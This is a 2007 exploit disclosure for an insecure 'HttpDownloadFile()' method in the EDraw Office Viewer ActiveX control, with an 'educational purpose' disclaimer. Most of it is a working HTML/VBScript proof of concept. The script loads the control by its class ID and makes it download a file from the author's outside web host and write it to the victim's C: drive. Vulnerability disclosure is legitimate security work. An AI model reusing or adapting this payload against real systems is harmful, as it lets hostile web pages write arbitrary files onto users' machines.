38 lines
No EOL
1.4 KiB
HTML
38 lines
No EOL
1.4 KiB
HTML
<pre>
|
|
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">--------------------------------------------------------------------------------------------------------------
|
|
<b>0-day EDraw Office Viewer Component 5.1 (officeviewer.ocx v. 5.1.199.1) "HttpDownloadFile()" Insecure Method</b>
|
|
url: http://www.ocxt.com/officeviewer.php
|
|
|
|
author: shinnai
|
|
mail: shinnai[at]autistici[dot]org
|
|
site: http://shinnai.altervista.org
|
|
|
|
This was written for educational purpose. Use it at your own risk.
|
|
Author will be not be responsible for any damage.
|
|
|
|
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
|
|
all software that use this ocx are vulnerable to this exploits.
|
|
|
|
<b>This ActiveX is marked as:
|
|
RegKey Safe for Script: True
|
|
RegKey Safe for Init: True
|
|
Implements IObjectSafety: True
|
|
IDisp Safe: Safe for untrusted: caller, data
|
|
IPStorage Safe: Safe for untrusted: caller,data</b>
|
|
--------------------------------------------------------------------------------------------------------------
|
|
|
|
<object classid='clsid:6BA21C22-53A5-463F-BBE8-5CF7FFA0132B' id='test'></object>
|
|
|
|
<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">
|
|
|
|
<script language='vbscript'>
|
|
Sub tryMe
|
|
On Error Resume Next
|
|
test.HttpDownloadFile "http://www.shinnai.altervista.org/shinnai.txt", "c:\shinnai.txt"
|
|
MsgBox("Exploit completed!")
|
|
End Sub
|
|
</script>
|
|
</span>
|
|
</code></pre>
|
|
|
|
# milw0rm.com [2007-08-16] |